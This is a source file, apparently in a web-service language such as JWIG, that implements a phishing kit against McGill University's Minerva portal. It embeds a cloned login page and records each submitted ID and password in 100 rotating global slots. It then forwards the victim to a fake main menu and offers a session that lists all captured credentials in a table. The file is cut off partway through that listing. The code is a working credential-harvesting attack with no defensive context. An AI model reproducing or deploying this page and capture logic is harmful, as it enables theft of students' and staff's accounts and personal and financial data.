service {

	const html Phish =
	<html><head>
	<link rel="stylesheet" href="https://banweb.mcgill.ca/mcgcss/mcg_web_defaultapp.css"  type="text/css">
	<link rel="stylesheet" href="https://banweb.mcgill.ca/mcgcss/web_defaultprint.css" type="text/css" media="print">
	<title>User Login</title>
	</head><body onload="document.loginform.UserID.focus()">
	<div class="headerwrapperdiv">
	<div class="pageheaderdiv1">
	<a href="#main_content" onmouseover="window.status='Go to Main Content'; return true" onmouseout="window.status=''; return true" onfocus="window.status='Go to Main Content'; return true" onblur="window.status=''; return true" class="skiplinks">Go to Main Content</a>
	<h1>Minerva</h1></div><div class="headerlinksdiv">
	<table class="plaintable" summary="This table displays Menu Items and Banner Search textbox." width="100%">
	<tbody><tr>
	<td class="pldefault">
	<div class="headerlinksdiv2">
	&nbsp;
	</div>
	</td>
	<td class="pldefault"><p class="rightaligntext">
	<span class="pageheaderlinks">
	<a href="https://banweb.mcgill.ca:4460/fr-MCGP/twbkwbis.P_WWWLogin" class="submenulinktext2">FRAN&Ccedil;AIS</a>
	|
	<a href="http://www.is.mcgill.ca/whelp/gen_help/login.htm" accesskey="H" onclick="popup = window.open('http://www.is.mcgill.ca/whelp/gen_help/login.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onmouseover="window.status='';  return true" onmouseout="window.status=''; return true" onfocus="window.status='';  return true" onblur="window.status=''; return true" class="submenulinktext2">HELP</a>
	|
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</a>
	</span>
	</p></td>
	</tr>
	</tbody></table>
	</div>
	<div class="pagetitlediv">
	<table class="plaintable" summary="This table displays title and static header displays." width="100%">
	<tbody><tr>
	<td class="pldefault">
	<img src="https://banweb.mcgill.ca/mcggifs/Log_in.gif" title="" name="Log_in" align="left" border="0" vspace="0" width="40" height="52" hspace="15">
	<h2>User Login</h2>
	</td>
	<td class="pldefault">
	</td>
	<td class="pldefault"><p class="rightaligntext">
	</p><div class="staticheaders">
	</div>
	</td>
	</tr>
	<tr>
	<td class="bg3" colspan="3" width="100%"><img src="minerva_files/web_transparent.gif" alt="Transparent Image" title="Transparent Image" name="web_transparent" border="0" vspace="0" width="10" height="3" hspace="0"></td>
	</tr>
	</tbody></table>
	<a name="main_content"></a>
	</div>
	<div class="pagebodydiv">
	<div class="infotextdiv"><table class="infotexttable" summary="This layout table contains information that may be helpful in understanding the content and functionality of this page.  It could be a brief set of instructions, a description of error messages, or other special information."><tbody><tr><td class="indefault"><span class="infotext">
	This is a private information system for use by authorized personnel
	only. Unauthorized access may lead to legal prosecution. All Minerva
	users agree to comply with the <a href="http://www.mcgill.ca/cio/e-policies/#CONDUCT" target="_blank">Code of Conduct</a>.
	Minerva is certified compatible with the following web browsers:
	Internet Explorer 6.0 (with SP2), Firefox 1.0 on Windows 2000 and XP,
	and Safari 1.2 on Mac OS 10.3. User experience indicates that Minerva
	can also be used with IE 7.0, Firefox 2.0, and the latest versions of
	Mac OS 10 and Windows Vista.
	<p><b>First-time login</b>:  The first time you log into Minerva, you must enter your 9-digit <b>McGill ID</b> and 6-character temporary <b>PIN</b>. You will also be prompted to <b>Change your PIN</b> and set up a <b>Security Question</b>, which will allow you to use the <b>Forgot PIN?</b> feature to reset it in case you forget it. </p><p><b>After your first-time login</b>: You may enter <b>EITHER</b><br><br></p><ul><li><b> McGill ID</b> and <b>6-character PIN</b> <br><b>OR</b></li><li><b>McGill Username</b>, such as <em>john.doe@mail.mcgill.ca</em> for students or <em>john.doe@mcgill.ca</em> for staff, and <b>8-character McGill Password.</b></li></ul><b> Exceptions</b>:  <font color="#ff0000">Applicants</font>, continue to log in using your McGill ID and PIN until you confirm your acceptance of admission.  <font color="#ff0000">Guests</font>, continue to use your McGill ID and PIN. <p></p>
	<p><b>Problems logging in?</b> Click <b>HELP</b> at the top right corner. When finished using Minerva, please click <b>EXIT</b> and close your browser to protect your privacy. </p>
	</span></td></tr></tbody></table><p></p></div>

	<table class="dataentrytable" summary="This data entry table is used to format the user login fields">
	<tbody><tr>
	<td class="delabel" scope="row"><label for="UserID"><span class="fieldlabeltext">McGill ID / McGill Username:</span></label></td>
	<td class="dedefault"><input name="sid" size="20" maxlength="80" id="UserID" type="text"></td>
	</tr>
	<tr>
	<td class="delabel" scope="row"><label for="PIN"><span class="fieldlabeltext">PIN / McGill Password:</span></label></td>
	<td class="dedefault"><input type="text" name="PIN" size="20" maxlength="80" id="PIN"></td>
	</tr>
	</tbody></table>
	<p>

	<table class="plaintable" summary="This is table displays line separator at end of the page." border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td class="bgtabon" colspan="2" width="100%"><img src="minerva_files/web_transparent.gif" alt="Transparent Image" title="Transparent Image" name="web_transparent" border="0" vspace="0" width="10" height="3" hspace="0"></td></tr></tbody></table>
	<a href="#top" onmouseover="window.status='Skip to top of page'; return true" onmouseout="window.status=''; return true" onfocus="window.status='Skip to top of page'; return true" onblur="window.status=''; return true" class="skiplinks">Skip to top of page</a>
	</p><div class="pagefooterdiv">
	<span class="releasetext">Release: 7.3</span>
	</div>
	<div class="div2"></div>
	<div class="div3"></div>
	<div class="div4"></div>
	<div class="div5"></div>
	<div class="div6"></div>
	</div></div></body></html>;

	const html MainMenu = 
	<html>
	<HEAD>
	<LINK REL="stylesheet" HREF="https://banweb.mcgill.ca/mcgcss/mcg_web_defaultapp.css" TYPE="text/css">
	<LINK REL="stylesheet" HREF="https://banweb.mcgill.ca/css/web_defaultprint.css" TYPE="text/css" media="print">
	<TITLE>Main Menu</TITLE>
	</HEAD>
	<BODY>
	<DIV class="headerwrapperdiv">
	<DIV class="pageheaderdiv1">
	<A HREF="#main_content" onMouseover="window.status='Go to Main Content'; return true" onMouseout="window.status=''; return true" OnFocus="window.status='Go to Main Content'; return true" onBlur="window.status=''; return true" class="skiplinks">Go to Main Content</A>
	<H1>Minerva</H1></DIV><DIV class="headerlinksdiv">
	<SPAN class="pageheaderlinks2">
	<MAP NAME="Module_Navigation_Links_H" title="Module Navigation Links">
	<p>
	<A HREF="#skip_Module_Navigation_Links_H" onMouseover="window.status='Skip Module Navigation Links'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Skip Module Navigation Links'; return true" onBlur="window.status=''; return true"  class="skiplinks">Skip Module Navigation Links</A>
	<TABLE  CLASS="plaintable" SUMMARY="This is main table for displaying Tab Items."
							  WIDTH="100%" cellSpacing=0 cellPadding=0 border=0>
	<TR>
	<TD CLASS="pldefault">
	<TABLE  CLASS="plaintable" SUMMARY="This table displays Tab Items."
					 cellSpacing=0 cellPadding=0 border=0>
	<TR>
	<td class=tabon height=22>
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_MainMnu" onMouseover="window.status='Main menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Main menu'; return true" onBlur="window.status=''; return true" >MAIN MENU</A>
	</TD>
	<TD class=bgtabon height=22 vAlign=top align=right>
	<IMG SRC="/wtlgifs/web_tab_corner_right.gif" ALT="Tab Corner Right" TITLE="Tab Corner Right"  NAME="web_tab_corner_right" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=20 WIDTH=8>
	</TD>
	<td class=taboff  height=22>
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_PersonalMnu" onMouseover="window.status='Personal Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Personal Menu'; return true" onBlur="window.status=''; return true" >Personal</A>
	</TD>
	<TD class=bgtaboff height=22 vAlign=top align=right>
	<IMG SRC="/wtlgifs/web_tab_corner_right.gif" ALT="Tab Corner Right" TITLE="Tab Corner Right"  NAME="web_tab_corner_right" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=20 WIDTH=8>
	</TD>
	<td class=taboff  height=22>
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_StuMainMnu" onMouseover="window.status='Student Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Student Menu'; return true" onBlur="window.status=''; return true" >Student</A>
	</TD>
	<TD class=bgtaboff height=22 vAlign=top align=right>
	<IMG SRC="/wtlgifs/web_tab_corner_right.gif" ALT="Tab Corner Right" TITLE="Tab Corner Right"  NAME="web_tab_corner_right" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=20 WIDTH=8>
	</TD>
	<td class=taboff  height=22>
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_ApplMnu" onMouseover="window.status='Applicant Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Applicant Menu'; return true" onBlur="window.status=''; return true" >Applicant</A>
	</TD>
	<TD class=bgtaboff height=22 vAlign=top align=right>
	<IMG SRC="/wtlgifs/web_tab_corner_right.gif" ALT="Tab Corner Right" TITLE="Tab Corner Right"  NAME="web_tab_corner_right" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=20 WIDTH=8>
	</TD>
	<td class=taboff  height=22>
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_FAApplStuMnu" onMouseover="window.status='Financial Aid'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Financial Aid'; return true" onBlur="window.status=''; return true" >Financial Aid</A>
	</TD>
	<TD class=bgtaboff height=22 vAlign=top align=right>
	<IMG SRC="/wtlgifs/web_tab_corner_right.gif" ALT="Tab Corner Right" TITLE="Tab Corner Right"  NAME="web_tab_corner_right" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=20 WIDTH=8>
	</TD>
	</TR>
	</TABLE>
	</TD>
	</TR>
	<TR>
	<TD class=bgtabon width="100%" colSpan=2><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image"  NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD></TR></TABLE>
	</MAP>
	</SPAN>
	<a name="skip_Module_Navigation_Links_H"></a>
	</DIV>
	<TABLE  CLASS="plaintable" SUMMARY="This table displays Menu Items and Banner Search textbox."
			 WIDTH="100%">
	<TR>
	<TD CLASS="pldefault">
	<DIV class="headerlinksdiv2">
	&nbsp;
	</div>
	</TD>
	<TD CLASS="pldefault"><p class="rightaligntext">
	<SPAN class="pageheaderlinks">
	<A HREF="https://banweb.mcgill.ca:4460/fr-MCGP/twbkwbis.P_GenMenu?name=bmenu.P_MainMnu" class="submenulinktext2">FRAN&Ccedil;AIS</A>
	|
	<A HREF="http://www.is.mcgill.ca/whelp/gen_help/default_help.htm" accesskey="H" onClick="popup = window.open('http://www.is.mcgill.ca/whelp/gen_help/default_help.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status='';  return true" onMouseOut="window.status=''; return true"onFocus="window.status='';  return true" onBlur="window.status=''; return true"  class="submenulinktext2">HELP</A>
	|
	<A HREF="https://banweb.mcgill.ca/mcgp/twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A>
	</span>
	</TD>
	</TR>
	</TABLE>
	</DIV>
	<DIV class="pagetitlediv">
	<TABLE  CLASS="plaintable" SUMMARY="This table displays title and static header displays."
	   WIDTH="100%">
	<TR>
	<TD CLASS="pldefault">
	<H2>Main Menu</H2>
	</TD>
	<TD CLASS="pldefault">
	&nbsp;
	</TD>
	<TD CLASS="pldefault"><p class="rightaligntext">
	<DIV class="staticheaders">
	</div>
	</TD>
	</TR>
	<TR>
	<TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image"  NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD>
	</TR>
	</TABLE>
	<a name="main_content"></a>
	</DIV>
	<DIV class="pagebodydiv">

	<TABLE  CLASS="plaintable" summary="This layout table holds message information">
	<TR>
	<TD CLASS="pldefault">
	&nbsp;
	</TD>
	<TD CLASS="pldefault">
	<b>Welcome to Minerva - McGill's Administrative Systems!</b>
	<BR>
	</TD>
	</TR>
	</TABLE>
	<P>

	<TABLE  CLASS="menuplaintable" summary="This layout table holds the menu items">
	<TR>
	<TD CLASS="mpdefault">&nbsp;</TD>
	<TD CLASS="mpdefault">
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_PersonalMnu"  class=submenulinktext2 onMouseover="window.status='Personal Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Personal Menu'; return true" onBlur="window.status=''; return true" >Personal Menu</A>
	<BR>
	<SPAN class=menulinkdesctext >Change Minerva PIN or Security Question; Create / Change McGill Password; Update addresses, phone numbers and emergency contact information, Email address, name, and other personal data.<br><font color="FF0000">Important Notice for Students: Please read the <a href="http://www.mcgill.ca/email-policy/" target="_blank">McGill Email Policy</a></font>
	 <p></SPAN>
	</TD>
	</TR>
	<TR>
	<TD CLASS="mpdefault">&nbsp;</TD>
	<TD CLASS="mpdefault">
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_StuMainMnu"  class=submenulinktext2 onMouseover="window.status='Student Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Student Menu'; return true" onBlur="window.status=''; return true" >Student Menu</A>
	<BR>
	<SPAN class=menulinkdesctext ><B>Register</B> for course sections; Add/Drop course sections; Change your curriculum; Choose Satisfactory/Unsatisfactory option; Withdraw from course sections; Review fees; Verify your academic program; Apply for graduation; View grades and order transcripts; Tax receipts; Generate a Degree Evaluation (selected programs); Mercury.<p></SPAN>
	</TD>
	</TR>
	<TR>
	<TD CLASS="mpdefault">&nbsp;</TD>
	<TD CLASS="mpdefault">
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_ApplMnu"  class=submenulinktext2 onMouseover="window.status='Applicant Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Applicant Menu'; return true" onBlur="window.status=''; return true" >Applicant Menu</A>
	<BR>
	<SPAN class=menulinkdesctext >File an application for admissions; View status of existing applications, including the receipt of supporting documents; Confirm space in Residence (eligible students). <p></SPAN>
	</TD>
	</TR>
	<TR>
	<TD CLASS="mpdefault">&nbsp;</TD>
	<TD CLASS="mpdefault">
	<a href="https://banweb.mcgill.ca/mcgp/twbkwbis.P_GenMenu?name=bmenu.P_FAApplStuMnu"  class=submenulinktext2 onMouseover="window.status='Financial Aid Menu'; return true" onMouseout="window.status=''; return true" onFocus="window.status='Financial Aid Menu'; return true" onBlur="window.status=''; return true" >Financial Aid Menu</A>
	<BR>
	<SPAN class=menulinkdesctext >Apply for Financial Aid; Review the status of your financial aid applications; Check status of document requirements; Review loans.<p></SPAN>
	</TD>
	</TR>
	</TABLE>
	<TABLE  CLASS="plaintable" SUMMARY="This is table displays line separator at end of the page."
												 WIDTH="100%" cellSpacing=0 cellPadding=0 border=0><TR><TD class=bgtabon width="100%" colSpan=2><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image"  NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD></TR></TABLE>
	<A HREF="#top" onMouseover="window.status='Skip to top of page'; return true" onMouseout="window.status=''; return true" OnFocus="window.status='Skip to top of page'; return true" onBlur="window.status=''; return true" class="skiplinks">Skip to top of page</A>
	<DIV class="pagefooterdiv">
	<SPAN class="releasetext">Release: 7.3</SPAN>
	</DIV>
	<DIV class="div2"></DIV>
	<DIV class="div3"></DIV>
	<DIV class="div4"></DIV>
	<DIV class="div5"></DIV>
	<DIV class="div6"></DIV>
	</BODY>
	</html>;
	
	const html PhishedInfo =
	<html>
	<body>
	
	<table>
		<tr><td><b>Username</td><td><b>Password</td></tr>
		<tr><td><[u1]></td><td><[p1]></td></tr>
		<tr><td><[u2]></td><td><[p2]></td></tr>
		<tr><td><[u3]></td><td><[p3]></td></tr>
		<tr><td><[u4]></td><td><[p4]></td></tr>
		<tr><td><[u5]></td><td><[p5]></td></tr>
		<tr><td><[u6]></td><td><[p6]></td></tr>
		<tr><td><[u7]></td><td><[p7]></td></tr>
		<tr><td><[u8]></td><td><[p8]></td></tr>
		<tr><td><[u9]></td><td><[p9]></td></tr>
		<tr><td><[u10]></td><td><[p10]></td></tr>
		<tr><td><[u11]></td><td><[p11]></td></tr>
		<tr><td><[u12]></td><td><[p12]></td></tr>
		<tr><td><[u13]></td><td><[p13]></td></tr>
		<tr><td><[u14]></td><td><[p14]></td></tr>
		<tr><td><[u15]></td><td><[p15]></td></tr>
		<tr><td><[u16]></td><td><[p16]></td></tr>
		<tr><td><[u17]></td><td><[p17]></td></tr>
		<tr><td><[u18]></td><td><[p18]></td></tr>
		<tr><td><[u19]></td><td><[p19]></td></tr>
		<tr><td><[u20]></td><td><[p20]></td></tr>
		<tr><td><[u21]></td><td><[p21]></td></tr>
		<tr><td><[u22]></td><td><[p22]></td></tr>
		<tr><td><[u23]></td><td><[p23]></td></tr>
		<tr><td><[u24]></td><td><[p24]></td></tr>
		<tr><td><[u25]></td><td><[p25]></td></tr>
		<tr><td><[u26]></td><td><[p26]></td></tr>
		<tr><td><[u27]></td><td><[p27]></td></tr>
		<tr><td><[u28]></td><td><[p28]></td></tr>
		<tr><td><[u29]></td><td><[p29]></td></tr>
		<tr><td><[u30]></td><td><[p30]></td></tr>
		<tr><td><[u31]></td><td><[p31]></td></tr>
		<tr><td><[u32]></td><td><[p32]></td></tr>
		<tr><td><[u33]></td><td><[p33]></td></tr>
		<tr><td><[u34]></td><td><[p34]></td></tr>
		<tr><td><[u35]></td><td><[p35]></td></tr>
		<tr><td><[u36]></td><td><[p36]></td></tr>
		<tr><td><[u37]></td><td><[p37]></td></tr>
		<tr><td><[u38]></td><td><[p38]></td></tr>
		<tr><td><[u39]></td><td><[p39]></td></tr>
		<tr><td><[u40]></td><td><[p40]></td></tr>
		<tr><td><[u41]></td><td><[p41]></td></tr>
		<tr><td><[u42]></td><td><[p42]></td></tr>
		<tr><td><[u43]></td><td><[p43]></td></tr>
		<tr><td><[u44]></td><td><[p44]></td></tr>
		<tr><td><[u45]></td><td><[p45]></td></tr>
		<tr><td><[u46]></td><td><[p46]></td></tr>
		<tr><td><[u47]></td><td><[p47]></td></tr>
		<tr><td><[u48]></td><td><[p48]></td></tr>
		<tr><td><[u49]></td><td><[p49]></td></tr>
		<tr><td><[u50]></td><td><[p50]></td></tr>
		<tr><td><[u51]></td><td><[p51]></td></tr>
		<tr><td><[u52]></td><td><[p52]></td></tr>
		<tr><td><[u53]></td><td><[p53]></td></tr>
		<tr><td><[u54]></td><td><[p54]></td></tr>
		<tr><td><[u55]></td><td><[p55]></td></tr>
		<tr><td><[u56]></td><td><[p56]></td></tr>
		<tr><td><[u57]></td><td><[p57]></td></tr>
		<tr><td><[u58]></td><td><[p58]></td></tr>
		<tr><td><[u59]></td><td><[p59]></td></tr>
		<tr><td><[u60]></td><td><[p60]></td></tr>
		<tr><td><[u61]></td><td><[p61]></td></tr>
		<tr><td><[u62]></td><td><[p62]></td></tr>
		<tr><td><[u63]></td><td><[p63]></td></tr>
		<tr><td><[u64]></td><td><[p64]></td></tr>
		<tr><td><[u65]></td><td><[p65]></td></tr>
		<tr><td><[u66]></td><td><[p66]></td></tr>
		<tr><td><[u67]></td><td><[p67]></td></tr>
		<tr><td><[u68]></td><td><[p68]></td></tr>
		<tr><td><[u69]></td><td><[p69]></td></tr>
		<tr><td><[u70]></td><td><[p70]></td></tr>
		<tr><td><[u71]></td><td><[p71]></td></tr>
		<tr><td><[u72]></td><td><[p72]></td></tr>
		<tr><td><[u73]></td><td><[p73]></td></tr>
		<tr><td><[u74]></td><td><[p74]></td></tr>
		<tr><td><[u75]></td><td><[p75]></td></tr>
		<tr><td><[u76]></td><td><[p76]></td></tr>
		<tr><td><[u77]></td><td><[p77]></td></tr>
		<tr><td><[u78]></td><td><[p78]></td></tr>
		<tr><td><[u79]></td><td><[p79]></td></tr>
		<tr><td><[u80]></td><td><[p80]></td></tr>
		<tr><td><[u81]></td><td><[p81]></td></tr>
		<tr><td><[u82]></td><td><[p82]></td></tr>
		<tr><td><[u83]></td><td><[p83]></td></tr>
		<tr><td><[u84]></td><td><[p84]></td></tr>
		<tr><td><[u85]></td><td><[p85]></td></tr>
		<tr><td><[u86]></td><td><[p86]></td></tr>
		<tr><td><[u87]></td><td><[p87]></td></tr>
		<tr><td><[u88]></td><td><[p88]></td></tr>
		<tr><td><[u89]></td><td><[p89]></td></tr>
		<tr><td><[u90]></td><td><[p90]></td></tr>
		<tr><td><[u91]></td><td><[p91]></td></tr>
		<tr><td><[u92]></td><td><[p92]></td></tr>
		<tr><td><[u93]></td><td><[p93]></td></tr>
		<tr><td><[u94]></td><td><[p94]></td></tr>
		<tr><td><[u95]></td><td><[p95]></td></tr>
		<tr><td><[u96]></td><td><[p96]></td></tr>
		<tr><td><[u97]></td><td><[p97]></td></tr>
		<tr><td><[u98]></td><td><[p98]></td></tr>
		<tr><td><[u99]></td><td><[p99]></td></tr>
		<tr><td><[u100]></td><td><[p100]></td></tr>	
	</table>
	
	</body>
	</html>;
	
	// Globals

	string u1;
	string u2;
	string u3;
	string u4;
	string u5;
	string u6;
	string u7;
	string u8;
	string u9;
	string u10;
	string u11;
	string u12;
	string u13;
	string u14;
	string u15;
	string u16;
	string u17;
	string u18;
	string u19;
	string u20;
	string u21;
	string u22;
	string u23;
	string u24;
	string u25;
	string u26;
	string u27;
	string u28;
	string u29;
	string u30;
	string u31;
	string u32;
	string u33;
	string u34;
	string u35;
	string u36;
	string u37;
	string u38;
	string u39;
	string u40;
	string u41;
	string u42;
	string u43;
	string u44;
	string u45;
	string u46;
	string u47;
	string u48;
	string u49;
	string u50;
	string u51;
	string u52;
	string u53;
	string u54;
	string u55;
	string u56;
	string u57;
	string u58;
	string u59;
	string u60;
	string u61;
	string u62;
	string u63;
	string u64;
	string u65;
	string u66;
	string u67;
	string u68;
	string u69;
	string u70;
	string u71;
	string u72;
	string u73;
	string u74;
	string u75;
	string u76;
	string u77;
	string u78;
	string u79;
	string u80;
	string u81;
	string u82;
	string u83;
	string u84;
	string u85;
	string u86;
	string u87;
	string u88;
	string u89;
	string u90;
	string u91;
	string u92;
	string u93;
	string u94;
	string u95;
	string u96;
	string u97;
	string u98;
	string u99;
	string u100;

	string p1;
	string p2;
	string p3;
	string p4;
	string p5;
	string p6;
	string p7;
	string p8;
	string p9;
	string p10;
	string p11;
	string p12;
	string p13;
	string p14;
	string p15;
	string p16;
	string p17;
	string p18;
	string p19;
	string p20;
	string p21;
	string p22;
	string p23;
	string p24;
	string p25;
	string p26;
	string p27;
	string p28;
	string p29;
	string p30;
	string p31;
	string p32;
	string p33;
	string p34;
	string p35;
	string p36;
	string p37;
	string p38;
	string p39;
	string p40;
	string p41;
	string p42;
	string p43;
	string p44;
	string p45;
	string p46;
	string p47;
	string p48;
	string p49;
	string p50;
	string p51;
	string p52;
	string p53;
	string p54;
	string p55;
	string p56;
	string p57;
	string p58;
	string p59;
	string p60;
	string p61;
	string p62;
	string p63;
	string p64;
	string p65;
	string p66;
	string p67;
	string p68;
	string p69;
	string p70;
	string p71;
	string p72;
	string p73;
	string p74;
	string p75;
	string p76;
	string p77;
	string p78;
	string p79;
	string p80;
	string p81;
	string p82;
	string p83;
	string p84;
	string p85;
	string p86;
	string p87;
	string p88;
	string p89;
	string p90;
	string p91;
	string p92;
	string p93;
	string p94;
	string p95;
	string p96;
	string p97;
	string p98;
	string p99;
	string p100;

	int count;

	session Show() {
	
		string username, password;
		
		show Phish receive [username = sid, password = PIN];
		
		// Wrap around to beginning of list and write over
		// old values if we run out of space.
		
		if (username != "" && password != "")
		{
			count = count + 1;
			if (count > 100)
				count = 1;
		}
		
		if (count == 1){u1=username;p1=password;}
		else if (count == 2){u2=username;p2=password;}
		else if (count == 3){u3=username;p3=password;}
		else if (count == 4){u4=username;p4=password;}
		else if (count == 5){u5=username;p5=password;}
		else if (count == 6){u6=username;p6=password;}
		else if (count == 7){u7=username;p7=password;}
		else if (count == 8){u8=username;p8=password;}
		else if (count == 9){u9=username;p9=password;}
		else if (count == 10){u10=username;p10=password;}
		else if (count == 11){u11=username;p11=password;}
		else if (count == 12){u12=username;p12=password;}
		else if (count == 13){u13=username;p13=password;}
		else if (count == 14){u14=username;p14=password;}
		else if (count == 15){u15=username;p15=password;}
		else if (count == 16){u16=username;p16=password;}
		else if (count == 17){u17=username;p17=password;}
		else if (count == 18){u18=username;p18=password;}
		else if (count == 19){u19=username;p19=password;}
		else if (count == 20){u20=username;p20=password;}
		else if (count == 21){u21=username;p21=password;}
		else if (count == 22){u22=username;p22=password;}
		else if (count == 23){u23=username;p23=password;}
		else if (count == 24){u24=username;p24=password;}
		else if (count == 25){u25=username;p25=password;}
		else if (count == 26){u26=username;p26=password;}
		else if (count == 27){u27=username;p27=password;}
		else if (count == 28){u28=username;p28=password;}
		else if (count == 29){u29=username;p29=password;}
		else if (count == 30){u30=username;p30=password;}
		else if (count == 31){u31=username;p31=password;}
		else if (count == 32){u32=username;p32=password;}
		else if (count == 33){u33=username;p33=password;}
		else if (count == 34){u34=username;p34=password;}
		else if (count == 35){u35=username;p35=password;}
		else if (count == 36){u36=username;p36=password;}
		else if (count == 37){u37=username;p37=password;}
		else if (count == 38){u38=username;p38=password;}
		else if (count == 39){u39=username;p39=password;}
		else if (count == 40){u40=username;p40=password;}
		else if (count == 41){u41=username;p41=password;}
		else if (count == 42){u42=username;p42=password;}
		else if (count == 43){u43=username;p43=password;}
		else if (count == 44){u44=username;p44=password;}
		else if (count == 45){u45=username;p45=password;}
		else if (count == 46){u46=username;p46=password;}
		else if (count == 47){u47=username;p47=password;}
		else if (count == 48){u48=username;p48=password;}
		else if (count == 49){u49=username;p49=password;}
		else if (count == 50){u50=username;p50=password;}
		else if (count == 51){u51=username;p51=password;}
		else if (count == 52){u52=username;p52=password;}
		else if (count == 53){u53=username;p53=password;}
		else if (count == 54){u54=username;p54=password;}
		else if (count == 55){u55=username;p55=password;}
		else if (count == 56){u56=username;p56=password;}
		else if (count == 57){u57=username;p57=password;}
		else if (count == 58){u58=username;p58=password;}
		else if (count == 59){u59=username;p59=password;}
		else if (count == 60){u60=username;p60=password;}
		else if (count == 61){u61=username;p61=password;}
		else if (count == 62){u62=username;p62=password;}
		else if (count == 63){u63=username;p63=password;}
		else if (count == 64){u64=username;p64=password;}
		else if (count == 65){u65=username;p65=password;}
		else if (count == 66){u66=username;p66=password;}
		else if (count == 67){u67=username;p67=password;}
		else if (count == 68){u68=username;p68=password;}
		else if (count == 69){u69=username;p69=password;}
		else if (count == 70){u70=username;p70=password;}
		else if (count == 71){u71=username;p71=password;}
		else if (count == 72){u72=username;p72=password;}
		else if (count == 73){u73=username;p73=password;}
		else if (count == 74){u74=username;p74=password;}
		else if (count == 75){u75=username;p75=password;}
		else if (count == 76){u76=username;p76=password;}
		else if (count == 77){u77=username;p77=password;}
		else if (count == 78){u78=username;p78=password;}
		else if (count == 79){u79=username;p79=password;}
		else if (count == 80){u80=username;p80=password;}
		else if (count == 81){u81=username;p81=password;}
		else if (count == 82){u82=username;p82=password;}
		else if (count == 83){u83=username;p83=password;}
		else if (count == 84){u84=username;p84=password;}
		else if (count == 85){u85=username;p85=password;}
		else if (count == 86){u86=username;p86=password;}
		else if (count == 87){u87=username;p87=password;}
		else if (count == 88){u88=username;p88=password;}
		else if (count == 89){u89=username;p89=password;}
		else if (count == 90){u90=username;p90=password;}
		else if (count == 91){u91=username;p91=password;}
		else if (count == 92){u92=username;p92=password;}
		else if (count == 93){u93=username;p93=password;}
		else if (count == 94){u94=username;p94=password;}
		else if (count == 95){u95=username;p95=password;}
		else if (count == 96){u96=username;p96=password;}
		else if (count == 97){u97=username;p97=password;}
		else if (count == 98){u98=username;p98=password;}
		else if (count == 99){u99=username;p99=password;}
		else if (count == 100){u100=username;p100=password;}
		
		exit MainMenu;
		
	}
	
	session CheckInfo()
	{
	
		exit plug PhishedInfo
		[
			u1 = u1, p1 = p1,
			u2 = u2, p2 = p2,
			u3 = u3, p3 = p3,
			u4 = u4, p4 = p4,
			u5 = u5, p5 = p5,
			u6 = u6, p6 = p6,
			u7 = u7, p7 = p7,
			u8 = u8, p8 = p8,
			u9 = u9, p9 = p9,
			u10 = u10, p10 = p10,
			u11 = u11, p11 = p11,
			u12 = u12, p12 = p12,
			u13 = u13, p13 = p13,
			u14 = u14, p14 = p14,
			u15 = u15, p15 = p15,
			u16 = u16, p16 = p16,
			u17 = u17, p17 = p17,
			u18 = u18, p18 = p18,
			u19 = u19, p19 = p19,
			u20 = u20, p20 = p20,
			u21 = u21, p21 = p21,
			u22 = u22, p22 = p22,
			u23 = u23, p23 = p23,
			u24 = u24, p24 = p24,
			u25 = u25, p25 = p25,
			u26 = u26, p26 = p26,
			u27 = u27, p27 = p27,
			u28 = u28, p28 = p28,
			u29 = u29, p29 = p29,
			u30 = u30, p30 = p30,
			u31 = u31, p31 = p31,
			u32 = u32, p32 = p32,
			u33 = u33, p33 = p33,
			u34 = u34, p34 = p34,
			u35 = u35, p35 = p35,
			u36 = u36, p36 = p36,
			u37 = u37, p37 = p37,
			u38 = u38, p38 = p38,
			u39 = u39, p39 = p39,
			u40 = u40, p40 = p40,
			u41 = u41, p41 = p41,
			u42 = u42, p42 = p42,
			u43 = u43, p43 = p43,
			u44 = u44, p44 = p44,
			u45 = u45, p45 = p45,
			u46 = u46, p46 = p46,
			u47 = u47, p47 = p47,
			u48 = u48, p48 = p48,
			u49 = u49, p49 = p49,
			u50 = u50, p50 = p50,
